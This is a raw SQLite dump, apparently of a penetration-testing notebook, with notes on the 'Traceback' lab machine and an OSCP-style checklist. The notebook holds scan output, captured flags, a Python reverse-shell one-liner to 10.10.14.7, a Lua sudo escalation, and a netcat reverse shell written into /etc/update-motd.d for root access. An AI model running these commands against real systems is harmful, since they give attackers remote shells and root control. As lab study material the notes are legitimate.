SQLite format 3@ -  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node  '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xAu/Pm'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"Aq Ĝk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*Auk!' 10.10.10.X$ nmap -sC -sV -Pn -p- -oA ./Traceback 10.10.10.181 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 13:30 EDT Nmap scan report for 10.10.10.181 Host is up (0.059s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA) | 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA) |_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Help us Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 143.71 secondscustom-colors*Aѩ=G = I&Iaan'  !WebDavcustom-colors$A[W;A[X2x)'  Dirb\DirBustercustom-colors$A?&xAu/Pm'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"Aq Ĝk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CX GG#Jq6)'  Dirb\DirBuster$ gobuster dir -u http://10.10.10.181 -w shells.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.181 [+] Threads: 10 [+] Wordlist: shells.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/08/26 13:39:49 Starting gobuster =============================================================== /smevk.php (Status: 200) =============================================================== 2020/08/26 13:39:51 Finished ===============================================================custom-colors$A?&xAѩAjH X#X/]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File SystemWriteable Files\Directories Directory List custom-colors$A[3QZ-U'  Host InformationOperating System Architecture Domain Installed Updates custom-colors$A[4* >O>B)''   Users & GroupsUsers Webadmin Sysadmin Groupscustom-colors$AѩSW; G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*܁.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg Q^Qg'  Goodiescustom-colorsVA?& c +e'   Priv EscalationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Exploit Code Used Proof\Lo+A'   Priv EscalationService Exploited: Vulnerability Type: Exploit POC:Scheduled Taskscustom-colors$ANl 7-G7o /9'  Software VersionsSoftware Versions Potential Exploitscustom-colorsANlH{xc/e'  Proof\Flags\Othersysadmin@traceback:~$ cat user.txt cat user.txt 4c38de47fbb880068709247dccfe53bf cat /root/root.txt e0d6f998ac7c3f0a47dd1b0b33198cfa custom-colors$Aѫi'  Passwordscustom-colors$A?'!f'   Hashescustom-colors$A?&&ich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ., (#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree custom-colorsAѦdh  ' Log Bookcustom-colors(AI^text> Description: Discovery of Vulnerability Lateral from web to sysadmin using Lua Exploit Code Used echo "require('os');" > priv.lua echo "os.execute('/bin/bash');" >> priv.lua sudo -u sysadmin /home/sysadmin/luvit ./priv.lua From here, Use PSPY to find update-motd.d running every 30 seconds. echo -ne '#!/bin/sh\n\nrm -rf /tmp/p; mknod /tmp/p p; /bin/bash </tmp/p | /bin/nc 10.10.14.7 4444 >/tmp/p' > /etc/update-motd.d/00-header Immediately SSH using generated keys and motd will execute and spawn a root shell Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsAѫ Ujjv)'  Script Resultscustom-colorsXAIZ|xAu#q/'  Post Exploitationcustom-colors*AIZnn=%y'  ExploitationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Exploit Code Used Proof\Local.txt File ☐ Scree%3'  ExploitationService Exploited: SmEvK v3 Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability I have no idea why this is even a thing. You'll probably never see this in reality. Exploit Code Used python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.7",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,AѪGC #Gol'   Othercustom-colorsA[EϯA[Tci '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!Bj '  SMBcustom-colorsA[PA[DNn )'  Other Servicescustom-colorsXA[Adk '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2